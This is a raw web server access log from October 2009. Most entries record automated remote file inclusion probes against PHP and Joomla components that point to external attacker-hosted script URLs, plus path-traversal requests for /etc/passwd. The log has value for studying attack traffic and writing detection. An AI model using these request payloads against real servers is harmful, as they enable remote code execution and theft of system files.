66.212.27.13 - - [25/Oct/2009:17:43:26 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?config_ext[admin_path]=&CONFIG_EXT[ADMIN_PATH]=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:43:27 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?config_ext[admin_path]=&CONFIG_EXT[ADMIN_PATH]=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
72.30.142.167 - - [25/Oct/2009:17:43:36 -0700] "GET /logs/access_090824.log HTTP/1.0" 200 5268694 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:43:46 -0700] "GET /logs/access_090420.log/administrator/components/com_extcalendar/admin_settings.php?config_ext[admin_path]=&CONFIG_EXT[ADMIN_PATH]=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:43:46 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?config_ext[admin_path]=&CONFIG_EXT[ADMIN_PATH]=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:43:46 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?config_ext[admin_path]=&CONFIG_EXT[ADMIN_PATH]=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
114.108.177.238 - - [25/Oct/2009:17:43:48 -0700] "GET /modules/postguestbook/styles/internal/header.php?http://econ1.nida.ac.th//review/icon.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
114.108.177.238 - - [25/Oct/2009:17:43:48 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?http://econ1.nida.ac.th//review/icon.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
114.108.177.238 - - [25/Oct/2009:17:43:55 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?http://econ1.nida.ac.th//review/icon.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
114.108.177.238 - - [25/Oct/2009:17:43:55 -0700] "GET /modules/postguestbook/styles/internal/header.php?http://econ1.nida.ac.th//review/icon.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:45:21 -0700] "GET /logs/access_090427.log/administrator/components/com_extcalendar/admin_settings.php?config_ext[admin_path]=&CONFIG_EXT[ADMIN_PATH]=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:45:30 -0700] "GET /logs/access_090427.log/administrator/components/com_extcalendar/admin_settings.php?config_ext[admin_path]=&CONFIG_EXT[ADMIN_PATH]=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:46:42 -0700] "GET /logs/access_090323.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://buro16.ru/////synonim.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:46:42 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://buro16.ru/////synonim.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:46:48 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:46:49 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:46:49 -0700] "GET /logs/access_090323.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:47:09 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:47:09 -0700] "GET /logs/access_090323.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:47:10 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.8.210 - - [25/Oct/2009:17:47:15 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.miomatrimonio.com/editor/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
69.175.8.210 - - [25/Oct/2009:17:47:15 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.miomatrimonio.com/editor/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
69.175.8.210 - - [25/Oct/2009:17:47:15 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.miomatrimonio.com/editor/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
69.175.8.210 - - [25/Oct/2009:17:47:21 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.miomatrimonio.com/editor/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
69.175.8.210 - - [25/Oct/2009:17:47:21 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.miomatrimonio.com/editor/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
69.175.8.210 - - [25/Oct/2009:17:47:21 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.miomatrimonio.com/editor/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
93.174.0.17 - - [25/Oct/2009:17:47:33 -0700] "GET /logs/access_090803.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:47:35 -0700] "GET /logs/access_090803.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://buro16.ru/////synonim.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:48:00 -0700] "GET /logs/access_090803.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:48:47 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:48:47 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
93.174.0.17 - - [25/Oct/2009:17:49:02 -0700] "GET /logs/access_090323.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://buro16.ru/////synonim.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:49:17 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:49:17 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:49:17 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:49:17 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
74.53.96.178 - - [25/Oct/2009:17:51:08 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "galf.org"
74.53.96.178 - - [25/Oct/2009:17:51:08 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "galf.org"
74.53.96.178 - - [25/Oct/2009:17:51:28 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "galf.org"
74.53.96.178 - - [25/Oct/2009:17:51:28 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "galf.org"
74.53.96.178 - - [25/Oct/2009:17:51:28 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "galf.org"
74.53.96.178 - - [25/Oct/2009:17:51:36 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
74.53.96.178 - - [25/Oct/2009:17:51:36 -0700] "GET /logs/access_090803.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
74.53.96.178 - - [25/Oct/2009:17:51:36 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
72.30.142.167 - - [25/Oct/2009:17:52:06 -0700] "GET /logs/access_090921.log HTTP/1.0" 200 5427548 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.53.96.178 - - [25/Oct/2009:17:52:15 -0700] "GET /logs/access_090803.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
74.53.96.178 - - [25/Oct/2009:17:52:15 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
74.53.96.178 - - [25/Oct/2009:17:52:15 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
74.53.96.178 - - [25/Oct/2009:17:53:07 -0700] "GET /logs/access_090928.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:53:55 -0700] "GET /logs/access_090928.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:53:55 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:53:55 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:54:16 -0700] "GET /logs/access_090928.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:54:16 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:54:16 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
74.53.96.178 - - [25/Oct/2009:17:54:36 -0700] "GET /logs/access_090928.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:57:20 -0700] "GET /logs/access_090907.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.212.27.13 - - [25/Oct/2009:17:57:42 -0700] "GET /logs/access_090907.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:58:51 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:58:51 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:58:51 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:17:58:52 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:18:02:17 -0700] "GET //?PP_PATH=http://www.klickcomk.com/css/id? HTTP/1.1" 200 1048 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:18:02:34 -0700] "GET /logs/access_090803.log///?PP_PATH=http://www.klickcomk.com/css/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:18:02:34 -0700] "GET /logs/access_090803.log///?PP_PATH=http://www.klickcomk.com/css/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:18:02:35 -0700] "GET /logs///?PP_PATH=http://www.klickcomk.com/css/id? HTTP/1.1" 200 4948 "-" "libwww-perl/5.831" "www.galf.org"
209.188.90.49 - - [25/Oct/2009:18:02:35 -0700] "GET /logs///?PP_PATH=http://www.klickcomk.com/css/id? HTTP/1.1" 200 4948 "-" "libwww-perl/5.831" "www.galf.org"
210.114.225.248 - - [25/Oct/2009:18:03:03 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.225.248 - - [25/Oct/2009:18:03:03 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.225.248 - - [25/Oct/2009:18:03:03 -0700] "GET /logs/access.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.225.248 - - [25/Oct/2009:18:03:10 -0700] "GET /logs/access.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.225.248 - - [25/Oct/2009:18:03:10 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.225.248 - - [25/Oct/2009:18:03:10 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.225.248 - - [25/Oct/2009:18:04:53 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.225.248 - - [25/Oct/2009:18:04:54 -0700] "GET /logs/access.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.225.248 - - [25/Oct/2009:18:04:57 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.225.248 - - [25/Oct/2009:18:05:17 -0700] "GET /logs/access.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.225.248 - - [25/Oct/2009:18:05:17 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
210.114.225.248 - - [25/Oct/2009:18:05:17 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
65.55.51.112 - - [25/Oct/2009:18:07:49 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:08:54 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:08:55 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:18:08:55 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
72.9.245.117 - - [25/Oct/2009:18:10:04 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.9.245.117 - - [25/Oct/2009:18:10:04 -0700] "GET /logs/access_090316.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.9.245.117 - - [25/Oct/2009:18:10:04 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.9.245.117 - - [25/Oct/2009:18:10:53 -0700] "GET /logs/access_090803.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.9.245.117 - - [25/Oct/2009:18:11:44 -0700] "GET /logs/access_090309.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:18:13:09 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:18:13:19 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 4947 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:18:14:55 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:18:14:55 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:18:15:10 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 4947 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:18:15:26 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:18:15:27 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 4947 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:18:15:31 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:18:17:10 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 4947 "-" "libwww-perl/5.805" "www.galf.org"
207.210.84.226 - - [25/Oct/2009:18:18:17 -0700] "GET /logs/access_090406.log//?index.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.210.84.226 - - [25/Oct/2009:18:18:17 -0700] "GET /?index.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
207.210.84.226 - - [25/Oct/2009:18:18:17 -0700] "GET /logs//?index.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
207.210.84.226 - - [25/Oct/2009:18:18:20 -0700] "GET /logs/access_090413.log//?index.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
